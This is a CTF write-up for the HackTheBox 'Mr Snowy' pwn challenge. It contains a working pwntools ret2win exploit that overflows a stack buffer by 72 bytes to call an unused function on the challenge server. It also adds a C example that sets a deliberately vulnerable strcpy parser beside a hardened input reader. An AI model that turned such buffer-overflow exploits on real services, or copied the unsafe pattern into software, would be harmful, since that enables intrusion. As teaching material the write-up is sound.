Mr Snowy

Event: Cyber Santa is Coming to Town – 2021 HackTheBox

Category: pwn

PTS: 300

Description:

There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. But, this ☃️ snowman… it scares me.. He is always 👀 staring at Santa’s house. Something must be wrong with him.



This is the mission: Deactivate that camera.
Opening the binary in Ghidra and analysing the "investigate" function, we can clearly see that there is no way of deactivating that camera through the program's intended options.
But the function list contains something interesting:


Opening the function:


This is what we were looking for: the path to the flag goes through this function, but it is never called by the program. How can we trigger it?
Python is always a good friend in this type of situation.
Using pwntools we can read the address of the deactivate_camera function from the ELF symbol table, and with a buffer overflow (caused by an unchecked input read) overwrite the saved return address so that the program returns into that specific address.

The offset from the start of the buffer to the saved return address can be found by trial and error with payloads of increasing length (here it turned out to be 72 bytes).

flag_index = p64(e.symbols['deactivate_camera'])  # target address packed as 8 little-endian bytes
payload = b'A' * offset + flag_index  # full payload: padding up to the return address, then the address (offset is set in the full script)

Add some interaction with the remote host, put everything together and:

from pwn import *

host = '178.128.35.132'
port = 32020
p = remote(host, port)

e = ELF('./mr_snowy')  # local copy of the binary, used only for the symbol address
print(p.recvuntil(b'it be'))  # pwntools tubes work on bytes, not str
print(p.recvline())
p.sendline(b'1')  # choose menu option 1
print(p.recvuntil(b'>'))

flag_index = p64(e.symbols['deactivate_camera'])  # target address packed as 8 little-endian bytes
offset = 72  # bytes of padding up to the saved return address (found by trial and error)
payload = b'A' * offset + flag_index  # full payload

p.sendline(payload)  # overwrite the return address with deactivate_camera
for i in range(18):  # read back the program's output, which includes the flag
    print(p.recvline())
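What the underlying defect looks like, and how it is fixed, as an added C illustration that is neither the challenge's source nor the author's code: parse_option_unsafe is a constructed stand-in for an unbounded copy into a fixed stack buffer (the bug class the padding-plus-address payload above relies on), parse_option_safe and read_line_bounded are the hardened forms, and demo_stream runs the hardened reader over a constructed input that contains one over-long line. The buffer size of 64, the function names and the sample input are assumptions; the real binary's stack layout is not shown on this page, only the 72-byte offset.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() used in the demo stream */
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed buffer size; stands in for the challenge's stack buffer, whose
 * real size is not given in the writeup (only the 72-byte offset is). */
#define OPTION_BUF 64

/* Vulnerable shape (constructed, not the challenge's source): the copy into a
 * fixed stack buffer is unbounded, so a line longer than OPTION_BUF-1 bytes
 * runs past the buffer into the saved frame pointer and return address. */
int parse_option_unsafe(const char *line) {
    char buf[OPTION_BUF];
    strcpy(buf, line);            /* no length check: the overflow happens here */
    return atoi(buf);             /* atoi also accepts "1junk" and overflows silently */
}

/* Hardened form: reject oversize input instead of truncating it, and require
 * the whole line to be one in-range integer. Returns 0 and stores the option,
 * or -1 when the input is empty, too long, non-numeric or out of int range. */
int parse_option_safe(const char *line, int *option) {
    char buf[OPTION_BUF];
    size_t len = strlen(line);
    if (len == 0 || len >= sizeof buf)
        return -1;                /* would not fit together with its NUL */
    memcpy(buf, line, len + 1);

    char *end;
    errno = 0;
    long v = strtol(buf, &end, 10);
    if (errno != 0 || end == buf || *end != '\0' || v < INT_MIN || v > INT_MAX)
        return -1;
    *option = (int)v;
    return 0;
}

/* Bounded line reader. fgets() never overflows buf, but it silently truncates,
 * and the unread tail of an over-long line would then be consumed as the next
 * line. This reader drains that tail and reports it.
 * Returns 1 for a complete line (newline stripped), 0 for a truncated line
 * (discarded, buf emptied), -1 at end of input. */
int read_line_bounded(FILE *in, char *buf, size_t sz) {
    if (fgets(buf, (int)sz, in) == NULL)
        return -1;
    char *nl = strchr(buf, '\n');
    if (nl) {
        *nl = '\0';
        return 1;
    }
    int c = fgetc(in);
    if (c == EOF)
        return 1;                 /* input ended exactly here: last line without newline */
    while (c != EOF && c != '\n')
        c = fgetc(in);            /* drain the rest of the over-long line */
    buf[0] = '\0';
    return 0;
}

/* Demo over a constructed in-memory stream: a valid option, a 99-byte line of
 * 'A's (the shape of input the exploit above sends), then another valid option.
 * Returns the accepted options concatenated as decimal digits: 12 means the
 * long line was rejected and both real options were read correctly. */
int demo_stream(void) {
    char big[100];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    char input[160];
    snprintf(input, sizeof input, "1\n%s\n2\n", big);

    FILE *in = fmemopen(input, strlen(input), "r");
    if (in == NULL)
        return -1;

    char line[OPTION_BUF];
    int opt = 0, accepted = 0, r;
    while ((r = read_line_bounded(in, line, sizeof line)) != -1) {
        if (r == 1 && parse_option_safe(line, &opt) == 0)
            accepted = accepted * 10 + opt;
    }
    fclose(in);
    return accepted;
}

int main(void) {
    printf("accepted options: %d\n", demo_stream());   /* expected: 12 */
    return 0;
}
```

The point of the rejecting variant over a plain fgets() is that an over-long line is reported to the caller and discarded whole; with fgets() alone the first 63 bytes would be parsed as the option and the remaining 'A's would be read as the following menu choice, which is confusing to debug and still leaves the program trusting input it never validated.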